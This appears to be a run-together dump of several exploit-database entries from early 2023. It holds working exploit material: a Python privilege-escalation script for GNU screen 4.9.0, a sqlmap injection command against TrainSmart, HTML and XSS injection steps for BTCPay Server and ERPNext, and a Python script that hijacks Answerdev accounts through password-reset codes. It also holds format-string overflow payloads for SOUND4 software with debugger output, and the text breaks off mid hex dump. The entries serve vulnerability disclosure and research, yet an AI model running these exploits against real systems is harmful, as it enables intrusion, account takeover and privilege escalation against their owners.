# Exploit Title: GNU screen v4.9.0 - Privilege Escalation # Date: 03.02.2023 # Exploit Author: Manuel Andreas # Vendor Homepage: https://www.gnu.org/software/screen/ # Software Link: https://ftp.gnu.org/gnu/screen/screen-4.9.0.tar.gz # Version: 4.9.0 # Tested on: Arch Linux # CVE : CVE-2023-24626 import os import socket import struct import argparse import subprocess import pty import time SOCKDIR_TEMPLATE = "/run/screens/S-{}" MAXPATHLEN = 4096 MAXTERMLEN = 32 MAXLOGINLEN = 256 STRUCTSIZE = 12584 MSG_QUERY = 9 def find_latest_socket(dir): return f"{dir}/{sorted(os.listdir(dir))[-1]}" def build_magic(ver=5): return ord('m') << 24 | ord('s') << 16 | ord('g') << 8 | ver def build_msg(type): return struct.pack("<ii", build_magic(), type) + MAXPATHLEN * b"T" def build_query(auser, nargs, cmd, apid, preselect, writeback): assert(len(auser) == MAXLOGINLEN + 1) assert(len(cmd) == MAXPATHLEN) assert(len(preselect) == 20) assert(len(writeback) == MAXPATHLEN) buf = build_msg(MSG_QUERY) buf += auser buf += 3 * b"\x00" #Padding buf += struct.pack("<i", nargs) buf += cmd buf += struct.pack("<i", apid) buf += preselect buf += writeback # Union padding buf += (STRUCTSIZE - len(buf)) * b"P" return buf def spawn_screen_instance(): # provide a pty mo, so = pty.openpty() me, se = pty.openpty() mi, si = pty.openpty() screen = subprocess.Popen("/usr/bin/screen", bufsize=0, stdin=si, stdout=so, stderr=se, close_fds=True, env={"TERM":"xterm"}) for fd in [so, se, si]: os.close(fd) return screen def main(): parser = argparse.ArgumentParser(description='PoC for sending SIGHUP as root utilizing GNU screen configured as setuid root.') parser.add_argument('pid', type=int, help='the pid to receive the signal') args = parser.parse_args() pid = args.pid username = os.getlogin() screen = spawn_screen_instance() print("Waiting a second for screen to setup its socket..") time.sleep(1) s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) socket_path = find_latest_socket(SOCKDIR_TEMPLATE.format(username)) print(f"Connecting to: {socket_path}") s.connect(socket_path) print('Sending message...') msg = build_query(username.encode('ascii') + (MAXLOGINLEN + 1 - len(username)) * b"\x00", 0, MAXPATHLEN * b"E", pid, 20 * b"\x00", MAXPATHLEN * b"D") s.sendmsg([msg]) s.recv(512) print(f'Ok sent SIGHUP to {pid}!') screen.kill() if __name__ == '__main__': main()

# Exploit Title: itech TrainSmart r1044 - SQL injection # Date: 03.02.2023 # Exploit Author: Adrian Bondocea # Software Link: https://sourceforge.net/p/trainsmart/code/HEAD/tree/code/ # Version: TrainSmart r1044 # Tested on: Linux # CVE : CVE-2021-36520 SQL injection vulnerability in itech TrainSmart r1044 allows remote attackers to view sensitive information via crafted command using sqlmap. PoC: sqlmap --url 'http://{URL}//evaluation/assign-evaluation?id=1' -p id -dbs

# Exploit Title: BTCPay Server v1.7.4 - HTML Injection # Date: 01/26/2023 # Exploit Author: Manojkumar J (TheWhiteEvil) # Vendor Homepage: https://github.com/btcpayserver/btcpayserver # Software Link: https://github.com/btcpayserver/btcpayserver/releases/tag/v1.7.5 # Version: <=1.7.4 # Tested on: Windows10 # CVE : CVE-2023-0493 # Description: BTCPay Server v1.7.4 HTML injection vulnerability. # Steps to exploit: 1. Create an account on the target website. Register endpoint: https://target-website.com/register# 2. Move on to the API key and create API key with the html injection in the label field. Example: <a href="https://hackerbro.in">clickhere</a> 3. Click remove/delete API key, the html injection will render.

## Exploit Title: ImageMagick 7.1.0-49 - DoS ## Author: nu11secur1ty ## Date: 02.07.2023 ## Vendor: https://imagemagick.org/ ## Software: https://imagemagick.en.uptodown.com/windows/download/82953605 ## Reference: https://portswigger.net/daily-swig/denial-of-service ## CVE-ID: CVE-2022-44267 ## Description: ImageMagick 7.1.0-49 is vulnerable to Denial of Service. When it parses a PNG image (e.g., for resize), the convert process could be left waiting for stdin input. The attacker can easily send a malicious png file to the victim and then when the victim has opened this png he will crash the program. STATUS: HIGH Vulnerability [+]Payload: [href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2022/CVE-2022-44267/PoC) ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2022/CVE-2022-44267) ## Proof and Exploit: [href](https://streamable.com/l7z79c) ## Time spend: 00:30:00 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>

# Exploit Title: ERPNext 12.29 - Cross-Site Scripting (XSS) # Date: 7 Feb 2023 # Exploit Author: Patrick Dean Ramos / Nathu Nandwani / Junnair Manla #Github - https://github.com/patrickdeanramos/CVE-2022-28598 # Vendor Homepage: https://erpnext.com/ # Version: 12.29 # CVE-2022-28598 Summary: Stored cross-site scripting (XSS) vulnerability was found in ERPNext 12.29 where the "last_known_version" field found in the "My Setting" page in ERPNext 12.29.0 allows remote attackers to inject arbitrary web script or HTML via a crafted site name by doing an authenticated POST HTTP request to '/desk#Form/User/(Authenticated User)' and inject the script in the 'last_known_version' field where we are able to view the script by clicking the 'pdf' view form. This vulnerability is specifically the "last_known_version" field found under the 'My Settings' where we need to first save the my settings. 1. Login as any user 2. Under the ‘last_known_version’ field we are going to inject our malicious script. 3. To view our injected script we need to click the view pdf page, and as seen below we have successfully injected our script.

# Exploit Title: Answerdev 1.0.3 - Account Takeover # Date: Reported on Jan 24th 2023 # Exploit Author: Eduardo Pérez-Malumbres Cervera @blueudp # Vendor Homepage: https://answer.dev/ # Software Link: https://github.com/answerdev/answer # Version: 1.0.3 # Tested on: Ubuntu 22.04 / Debian 11 # CVE : CVE-2023-0744 from sys import argv import urllib3 from requests import post urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) def ato(url: list, email: str) -> str: try: return f"Your Link: {''.join(url)}users/password-reset?code=" + \ post(f"{''.join(url)}answer/api/v1/user/password/reset", json={"e_mail": email}, verify=False).json()["data"] except Exception as err: return f"Cant reach URL: {err}" if __name__ == "__main__": if len(argv) != 3: print(f"Usage: {argv[0]} https://answer.domain/ [email protected]") exit() print(ato([argv[1] if argv[1].endswith("/") else argv[1] + "/"], str(argv[2])))

# Exploit Title: SOUND4 LinkAndShare Transmitter 1.1.2 - Format String Stack Buffer Overflow # Exploit Author: LiquidWorm Vendor: SOUND4 Ltd. Product web page: https://www.sound4.com | https://www.sound4.biz Affected version: 1.1.2 Summary: The SOUND4 Link&Share (L&S) is a simple and open protocol that allow users to remotely control SOUND4 processors through a network connection. SOUND4 offers a tool that manage sending L&S commands to your processors: the Link&Share Transmitter. Desc: The application suffers from a format string memory leak and stack buffer overflow vulnerability because it fails to properly sanitize user supplied input when calling the getenv() function from MSVCR120.DLL resulting in a crash overflowing the memory stack and leaking sensitive information. The attacker can abuse the username environment variable to trigger and potentially execute code on the affected system. --------------------------------------------------------------------------- (4224.59e8): Security check failure or stack buffer overrun - code c0000409 (!!! second chance !!!) eax=00000001 ebx=00000000 ecx=00000005 edx=000001e9 esi=0119f36f edi=00000000 eip=645046b1 esp=0119f0b8 ebp=0119f0d0 iopl=0 nv up ei pl nz na po nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202 MSVCR120!_invoke_watson+0xe: 645046b1 cd29 int 29h --------------------------------------------------------------------------- Tested on: Microsoft Windows 10 Home Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2023-5744 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5744.php 26.09.2022 -- C:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter>set username=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDd%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA C:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter>LinkAndShareTransmitter.exe C:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter>02/02/23 17:06:19 : : Internal Error: can not replace file with temp file 02/02/23 17:06:19 : Background launch: User: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDd00000000013872CB0000000A012FF644776BE9250200000277666A78C60003C50000000077651CFC00000000012FF8B07770C59F0138F9D832EC2962011AE00000000000011B100000000001FFFFFC3E012FF814776A7252776A8D3B32EC29C60138000000000440012FF8B00138F0EC013889420000000001386DB000000006000000003B00003B00001000000000060000000301380294013800000200000200000000C60003C57769517C000000000000000100000000012FF764012FF75877694F2600FC000000FC0000012FF79800000008000003010000033C000000010139CF800000000000000087FFFFFCC40000000000000000000001F4013800010010002F00000001000000010000000002020002536E6957206B636F00302E3201380000012FF76400000000000007FF000003C5013800C0013899A4FFFFFFFE012FF7CC00000000000000000138CD100000008900000001000000000000033C012FF7CC000003450000000077694D110138C148000004480138CD10012FF800013800C001380000002C000200000001010001000000033C0139CF78012FF788000002BC0139CF780139CF8044B51122000000000000000000000AF00000000077694A9C770100BA01389918002FF8883B00003B000000000000033C013899180139CF7F00000000012FF7E0012FFB64776DAE6044B517CAFFFFFFFE012FF8A8776A6F0C00000440012FF9CC776A7252776A8D3B6E75521E676E696E00000200012FFA680138CD10012FF8687769470000000000012FF888776610783B00003B776D2D2C00000448FFFFFFFF00EC8D180000000002000002000000003F00033C00000003FFFFFFFF0000000000EC8D180139CF80002C0000000004400000000000EC8D180138000000EB0000000002BF000002FA0000510A32EC00000139D3C0013800000000000000EC8D18229F00000138898C0000002000000001012FFB103B00003BD1B0FD8E0000000000ECB3AC61636F6C736F686C0138007400051000000000090000000F34303033013800000138999000630069000000040000000F000000000069006400000080006F0056000000000000000F013927F8000002BC0000033C006100720000002F0000002F0065000000200073013800C00139D3C0000000000000000F010001000000004200000001006E0069000000000000000F0139D300013803AC000000010138C148000000000000000F000000000001007401389918013800C03B00003B0139D3C8000000000101991800000000013800C0006E00610000033C013A78A044B50000FFFFFF0000000AF0000000350000003F01389918010103AC000002BC0000002000260007012FFA88013AB160012FFA80776A634F0000004F00000B4000000B4F01380000776E7BC40139D3C80000002000180017012FFAB801392504012FFAB0776A634F00000051000000200000000E01380000012FFA44012FFA8C01399FE8012FFA5432EC2BEA0000003C776C4EB00139FE0C000000400000000E00ECA7300000000D000000000139FE10012FFA9067F0C042012FFA8867EEEE0C67fc0e0012ffac867ef2b40867f0bf8167f0bfbcc25352e4e776c4eb0deca73012ffac8776bac49512ffac412ffb0c1399fe812ffad432ec2b6a512ffafc67eef8c70012ffb0c67eef8d612ffb0c67eef90b013872ca12ffb1c67f0e537013872ca139c3e0139eda81399fe8eb1b0112ffb3467f0e5849094dec12ffb74ec89edeb0000013872cba9094db0ec88beec88be11ae0000013872cb12ffb40012ffbd0ec8ae98cba554012ffb8476f700f911ae00076f700e012ffbe0776c7bbe11ae00032ec2a320011ae000000000000012ffb90012ffbe8776dae6044b51d72012ffbf0776c7b8effffffff776e8d1d00ec88be11ae0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA --- C:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter>set username=%n C:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter>LinkAndShareTransmitter.exe (4224.59e8): Security check failure or stack buffer overrun - code c0000409 (!!! second chance !!!) eax=00000001 ebx=00000000 ecx=00000005 edx=000001e9 esi=0119f36f edi=00000000 eip=645046b1 esp=0119f0b8 ebp=0119f0d0 iopl=0 nv up ei pl nz na po nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202 MSVCR120!_invoke_watson+0xe: 645046b1 cd29 int 29h 0:000> kb # ChildEBP RetAddr Args to Child 00 0119f0b4 64504677 00000000 00000000 00000000 MSVCR120!_invoke_watson+0xe [f:\dd\vctools\crt\crtw32\misc\invarg.c @ 132] 01 0119f0d0 64504684 00000000 00000000 00000000 MSVCR120!_invalid_parameter+0x2a [f:\dd\vctools\crt\crtw32\misc\invarg.c @ 85] 02 0119f0e8 644757a7 0119f3bc 016b3908 016b3908 MSVCR120!_invalid_parameter_noinfo+0xc [f:\dd\vctools\crt\crtw32\misc\invarg.c @ 96] 03 0119f37c 644e4d1f 0119f39c 016b2ba0 00000000 MSVCR120!_output_l+0xb49 [f:\dd\vctools\crt\crtw32\stdio\output.c @ 1690] 04 0119f3bc 644e4c99 016b3908 00001a8e 016b2ba0 MSVCR120!_vsnprintf_l+0x81 [f:\dd\vctools\crt\crtw32\stdio\vsprintf.c @ 138] *** WARNING: Unable to verify checksum for c:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter\LinkAndShareTransmitter.exe *** ERROR: Module load completed but symbols could not be loaded for c:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter\LinkAndShareTransmitter.exe 05 0119f3d8 0100bb11 016b3908 00001a8e 016b2ba0 MSVCR120!_vsnprintf+0x16 [f:\dd\vctools\crt\crtw32\stdio\vsprintf.c @ 190] WARNING: Stack unwind information not available. Following frames may be wrong. 06 0119f498 0100bc9f 016b2ba0 0119f4b4 0119f9c4 LinkAndShareTransmitter+0xbb11 07 0119f4a8 01002f58 016b2ba0 00000000 01687ffb LinkAndShareTransmitter+0xbc9f 08 0119f9c4 010189ed 01000000 00000000 01687ffb LinkAndShareTransmitter+0x2f58 09 0119fa10 76f700f9 01323000 76f700e0 0119fa7c LinkAndShareTransmitter+0x189ed 0a 0119fa20 776c7bbe 01323000 c0289fff 00000000 KERNEL32!BaseThreadInitThunk+0x19 0b 0119fa7c 776c7b8e ffffffff 776e8d13 00000000 ntdll!__RtlUserThreadStart+0x2f 0c 0119fa8c 00000000 010188be 01323000 00000000 ntdll!_RtlUserThreadStart+0x1b 0:000> !analyze -v ******************************************************************************* * * * Exception Analysis * * * ******************************************************************************* GetUrlPageData2 (WinHttp) failed: 12002. DUMP_CLASS: 2 DUMP_QUALIFIER: 0 FAULTING_IP: MSVCR120!_invoke_watson+e [f:\dd\vctools\crt\crtw32\misc\invarg.c @ 132] 645046b1 cd29 int 29h EXCEPTION_RECORD: (.exr -1) ExceptionAddress: 645046b1 (MSVCR120!_invoke_watson+0x0000000e) ExceptionCode: c0000409 (Security check failure or stack buffer overrun) ExceptionFlags: 00000001 NumberParameters: 1 Parameter[0]: 00000005 Subcode: 0x5 FAST_FAIL_INVALID_ARG FAULTING_THREAD: 000059e8 DEFAULT_BUCKET_ID: FAIL_FAST_INVALID_ARG PROCESS_NAME: LinkAndShareTransmitter.exe ERROR_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application. EXCEPTION_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application. EXCEPTION_CODE_STR: c0000409 EXCEPTION_PARAMETER1: 00000005 WATSON_BKT_PROCSTAMP: 6144495e WATSON_BKT_PROCVER: 1.1.0.2 PROCESS_VER_PRODUCT: Sound4 Link&Share Transmitter WATSON_BKT_MODULE: MSVCR120.dll WATSON_BKT_MODSTAMP: 577e0f1e WATSON_BKT_MODOFFSET: a46b1 WATSON_BKT_MODVER: 12.0.40660.0 MODULE_VER_PRODUCT: Microsoft® Visual Studio® 2013 BUILD_VERSION_STRING: 10.0.19041.2364 (WinBuild.160101.0800) MODLIST_WITH_TSCHKSUM_HASH: 938db164a2b944fa7c2a5efef0c4e9b0f4b8e3d5 MODLIST_SHA1_HASH: 5990094944fb37a3f4c159affa51a53b6a58ac20 NTGLOBALFLAG: 70 APPLICATION_VERIFIER_FLAGS: 0 PRODUCT_TYPE: 1 SUITE_MASK: 784 DUMP_TYPE: fe ANALYSIS_SESSION_HOST: LAB17 ANALYSIS_SESSION_TIME: 01-29-2023 16:09:48.0143 ANALYSIS_VERSION: 10.0.16299.91 x86fre THREAD_ATTRIBUTES: OS_LOCALE: ENU PROBLEM_CLASSES: ID: [0n270] Type: [FAIL_FAST] Class: Primary Scope: DEFAULT_BUCKET_ID (Failure Bucket ID prefix) BUCKET_ID Name: Add Data: Omit PID: [Unspecified] TID: [Unspecified] Frame: [0] ID: [0n257] Type: [INVALID_ARG] Class: Addendum Scope: DEFAULT_BUCKET_ID (Failure Bucket ID prefix) BUCKET_ID Name: Add Data: Omit PID: [Unspecified] TID: [Unspecified] Frame: [0] BUGCHECK_STR: FAIL_FAST_INVALID_ARG PRIMARY_PROBLEM_CLASS: FAIL_FAST LAST_CONTROL_TRANSFER: from 64504677 to 645046b1 STACK_TEXT: 0119f0b4 64504677 00000000 00000000 00000000 MSVCR120!_invoke_watson+0xe 0119f0d0 64504684 00000000 00000000 00000000 MSVCR120!_invalid_parameter+0x2a 0119f0e8 644757a7 0119f3bc 016b3908 016b3908 MSVCR120!_invalid_parameter_noinfo+0xc 0119f37c 644e4d1f 0119f39c 016b2ba0 00000000 MSVCR120!_output_l+0xb49 0119f3bc 644e4c99 016b3908 00001a8e 016b2ba0 MSVCR120!_vsnprintf_l+0x81 0119f3d8 0100bb11 016b3908 00001a8e 016b2ba0 MSVCR120!_vsnprintf+0x16 WARNING: Stack unwind information not available. Following frames may be wrong. 0119f498 0100bc9f 016b2ba0 0119f4b4 0119f9c4 LinkAndShareTransmitter+0xbb11 0119f4a8 01002f58 016b2ba0 00000000 01687ffb LinkAndShareTransmitter+0xbc9f 0119f9c4 010189ed 01000000 00000000 01687ffb LinkAndShareTransmitter+0x2f58 0119fa10 76f700f9 01323000 76f700e0 0119fa7c LinkAndShareTransmitter+0x189ed 0119fa20 776c7bbe 01323000 c0289fff 00000000 KERNEL32!BaseThreadInitThunk+0x19 0119fa7c 776c7b8e ffffffff 776e8d13 00000000 ntdll!__RtlUserThreadStart+0x2f 0119fa8c 00000000 010188be 01323000 00000000 ntdll!_RtlUserThreadStart+0x1b STACK_COMMAND: ~0s ; .cxr ; kb THREAD_SHA1_HASH_MOD_FUNC: 0b8f8316052b30cae637e16edbb425a676500e95 THREAD_SHA1_HASH_MOD_FUNC_OFFSET: 359d5607a5627480201647a1bc659e9d2ac9281f THREAD_SHA1_HASH_MOD: 2418d74468f3882fef267f455cd32d7651645882 FOLLOWUP_IP: MSVCR120!_invoke_watson+e [f:\dd\vctools\crt\crtw32\misc\invarg.c @ 132] 645046b1 cd29 int 29h FAULT_INSTR_CODE: 6a5629cd FAULTING_SOURCE_LINE: f:\dd\vctools\crt\crtw32\misc\invarg.c FAULTING_SOURCE_FILE: f:\dd\vctools\crt\crtw32\misc\invarg.c FAULTING_SOURCE_LINE_NUMBER: 132 SYMBOL_STACK_INDEX: 0 SYMBOL_NAME: MSVCR120!_invoke_watson+e FOLLOWUP_NAME: MachineOwner MODULE_NAME: MSVCR120 IMAGE_NAME: MSVCR120.dll DEBUG_FLR_IMAGE_TIMESTAMP: 577e0f1e BUCKET_ID: FAIL_FAST_INVALID_ARG_MSVCR120!_invoke_watson+e FAILURE_EXCEPTION_CODE: c0000409 FAILURE_IMAGE_NAME: MSVCR120.dll BUCKET_ID_IMAGE_STR: MSVCR120.dll FAILURE_MODULE_NAME: MSVCR120 BUCKET_ID_MODULE_STR: MSVCR120 FAILURE_FUNCTION_NAME: _invoke_watson BUCKET_ID_FUNCTION_STR: _invoke_watson BUCKET_ID_OFFSET: e BUCKET_ID_MODTIMEDATESTAMP: 577e0f1e BUCKET_ID_MODCHECKSUM: f8aef BUCKET_ID_MODVER_STR: 12.0.40660.0 BUCKET_ID_PREFIX_STR: FAIL_FAST_INVALID_ARG_ FAILURE_PROBLEM_CLASS: FAIL_FAST FAILURE_SYMBOL_NAME: MSVCR120.dll!_invoke_watson FAILURE_BUCKET_ID: FAIL_FAST_INVALID_ARG_c0000409_MSVCR120.dll!_invoke_watson WATSON_STAGEONE_URL: http://watson.microsoft.com/StageOne/LinkAndShareTransmitter.exe/1.1.0.2/6144495e/MSVCR120.dll/12.0.40660.0/577e0f1e/c0000409/000a46b1.htm?Retriage=1 TARGET_TIME: 2023-01-29T15:09:52.000Z OSBUILD: 19044 OSSERVICEPACK: 2364 SERVICEPACK_NUMBER: 0 OS_REVISION: 0 OSPLATFORM_TYPE: x86 OSNAME: Windows 10 OSEDITION: Windows 10 WinNt SingleUserTS Personal USER_LCID: 0 OSBUILD_TIMESTAMP: 2008-01-07 11:33:18 BUILDDATESTAMP_STR: 160101.0800 BUILDLAB_STR: WinBuild BUILDOSVER_STR: 10.0.19041.2364 ANALYSIS_SESSION_ELAPSED_TIME: 635d ANALYSIS_SOURCE: UM FAILURE_ID_HASH_STRING: um:fail_fast_invalid_arg_c0000409_msvcr120.dll!_invoke_watson FAILURE_ID_HASH: {c9fee478-4ed1-0d2b-ddd7-dca655d9817f} Followup: MachineOwner --------- 0:000> d MSVCP120 70fb0000 4d 5a 90 00 03 00 00 00-04 00 00 00 ff ff 00 00 MZ.............. 70fb0010 b8 00 00 00 00 00 00 00-40 00 00 00 00 00 00 00 ........@....... 70fb0020 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ 70fb0030 00 00 00 